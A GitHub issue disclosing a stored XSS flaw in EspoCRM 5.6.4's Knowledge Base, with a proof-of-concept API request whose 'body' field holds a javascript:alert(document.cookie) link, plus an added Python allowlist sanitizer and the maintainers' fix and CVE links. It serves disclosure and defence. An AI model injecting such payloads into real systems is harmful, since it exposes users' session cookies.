
Stored XSS in Knowledge base #1356

Closed
KhajiitStoleNothing opened this issue Jul 18, 2019 · 2 comments

Comments

@KhajiitStoleNothing

Description

The current version of EspoCRM, 5.6.4, is vulnerable to stored XSS due to a lack of filtration of user-supplied data in the Knowledge Base. A malicious attacker can inject JavaScript code into the "body" parameter during knowledge base record creation. The PoC contains a link which will execute JavaScript code after being clicked.

PoC

Make the following request (insert your authentication data and hostname):

POST /api/v1/KnowledgeBaseArticle HTTP/1.1
Host: <HOSTNAME>
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: Basic <AUTH TOKEN>
Espo-Authorization: <AUTH TOKEN>
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: <COOKIE>
Content-Length: 285

{"status":"Draft","language":"","assignedUserId":"5d2309cc55c04135e","assignedUserName":"user1 user1","name":"test","body":"<p><a href=\"javascript:alert(document.cookie)\">1234</a><br></p>","portalsIds":[],"portalsNames":{},"attachmentsIds":[],"categoriesIds":[],"categoriesNames":{}}

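As an added example (not part of the original report or of EspoCRM's own code), the following Python allowlist sanitizer shows how a rich-text body field can be cleaned before it is stored or rendered, so that the PoC's javascript: link loses its href while ordinary links and markup survive. The tag, attribute and URL-scheme allowlists are assumptions chosen for illustration.

```python
# Added example, not EspoCRM code: allowlist sanitizer for an HTML "body" field.
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "a", "b", "i", "strong", "em", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}}   # no on* handlers, no style
SAFE_SCHEMES = {"http", "https", "mailto"}  # assumed policy for this example
VOID_TAGS = {"br"}


def safe_href(value):
    """True only for relative URLs or URLs whose scheme is allowlisted."""
    # Drop ASCII control characters and whitespace browsers ignore, then
    # compare the scheme case-insensitively.
    cleaned = "".join(ch for ch in value if ord(ch) > 32).lower()
    if ":" not in cleaned.split("/", 1)[0]:
        return True  # no scheme before the first slash: relative URL
    return cleaned.split(":", 1)[0] in SAFE_SCHEMES


class BodySanitizer(HTMLParser):
    def __init__(self):
        # convert_charrefs=True decodes entities first, so an entity-encoded
        # scheme is checked in its decoded form.
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag dropped; its text is still emitted escaped
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not safe_href(value or ""):
                continue  # the PoC's javascript: href is removed here
            v = escape(value or "", quote=True)
            kept.append(f' {name}="{v}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))  # text is never raw HTML


def sanitize_body(html):
    parser = BodySanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```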

@yurikuzn
Contributor

Fix: 6dd0bd8

@fgeek

fgeek commented Aug 7, 2019

https://nvd.nist.gov/vuln/detail/CVE-2019-14350 has been assigned for this vulnerability.
